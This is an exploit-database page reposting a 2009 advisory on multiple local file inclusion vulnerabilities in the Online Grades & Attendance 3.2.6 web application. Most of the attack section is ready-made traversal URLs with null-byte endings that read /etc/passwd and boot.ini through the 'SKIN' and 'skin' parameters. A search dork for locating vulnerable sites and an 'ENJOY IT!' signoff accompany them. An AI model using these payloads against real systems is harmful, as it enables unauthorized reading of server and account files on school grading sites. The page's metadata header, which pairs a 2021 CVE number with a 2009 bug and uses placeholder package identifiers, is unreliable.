Advertisement






Online Grades & Attendance 3.2.6 Multiple Local File Inclusion Vulns

CVE Category Price Severity
CVE-2021-22391 CWE-98 $500 High
Author Risk Exploitation Type Date
Unknown High Local 2009-06-22
CPE PURL
cpe:cpe:/a:vendorname:product:3.2.6 pkg:pkg:vendorname/packagename@version
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2009060141

Below is a copy:

----------------------------------------------------------------------------------------------
|       	   	   MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES	       	     |
|--------------------------------------------------------------------------------------------|
|                           |    Online Grades & Attendance v-3.2.6   |		    	     |
|  CMS INFORMATION:          -----------------------------------------	               	     |
|										             |
|-->WEB: http://www.onlinegrades.org/			          			     |
|-->DOWNLOAD: http://www.onlinegrades.org/		                  		     |
|-->DEMO: http://www.onlinegrades.org/demo_info						     |
|-->CATEGORY: CMS / Education								     |
|-->DESCRIPTION: Online Grades is based on the project, Basmati. It has all of the same      |
|		features plus many new features. OG is a web based grade...		     |
|-->RELEASED: 2009-02-05								     |
|											     |
|  CMS VULNERABILITY:									     |
|											     |
|-->TESTED ON: firefox 3						                     |
|-->DORK: "Powered by Online Grades"						             |
|-->CATEGORY: LOCAL FILE INCLUSION (LFI)					             |
|-->AFFECT VERSION: <= 3.2.6						 		     |
|-->Discovered Bug date: 2009-05-21							     |
|-->Reported Bug date: 2009-05-21							     |
|-->Fixed bug date: Not fixed								     |
|-->Info patch: Not fixed							             |
|-->Author: YEnH4ckEr									     |
|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
|-->WEB/BLOG: N/A									     |
|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)			     |
----------------------------------------------------------------------------------------------


###########################
///////////////////////////

LOCAL FILE INCLUSION (LFI):

///////////////////////////
###########################



<<<<---------++++++++++++++ Condition: register global = ON +++++++++++++++++--------->>>>



[++] var --> 'SKIN'



~~~> http://[HOST]/[PATH]/?GLOBALS[SKIN]=../../../../../boot.ini%00

~~~> http://[HOST]/[PATH]/?GLOBALS[SKIN]=../../../etc/passwd%00



<<<<---------++++++++++++++ Condition: Be admin user +++++++++++++++++--------->>>>



[++] GET var --> 'skin'



~~~> http://[HOST]/[PATH]/admin/admin.php?skin=../../../../../boot.ini%00

~~~> http://[HOST]/[PATH]/admin/admin.php?skin=../../../etc/passwd%00


<<<-----------------------------EOF---------------------------------->>>ENJOY IT!


You can watch "Online Grades" exploits in action:

SQLi --> http://www.youtube.com/watch?v=PWYh5254I4c
Credentials Changer  --> http://www.youtube.com/watch?v=BhHpLicPcC0 
LFI/BSQLi --> http://www.youtube.com/watch?v=Mlpve19l6_o
LFI/BSQLi --> http://www.youtube.com/watch?v=6kt-NU98GXU

##**************************************************************************##
##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!         ##
##**************************************************************************##
##--------------------------------------------------------------------------##
##**************************************************************************##
## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
##**************************************************************************##

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum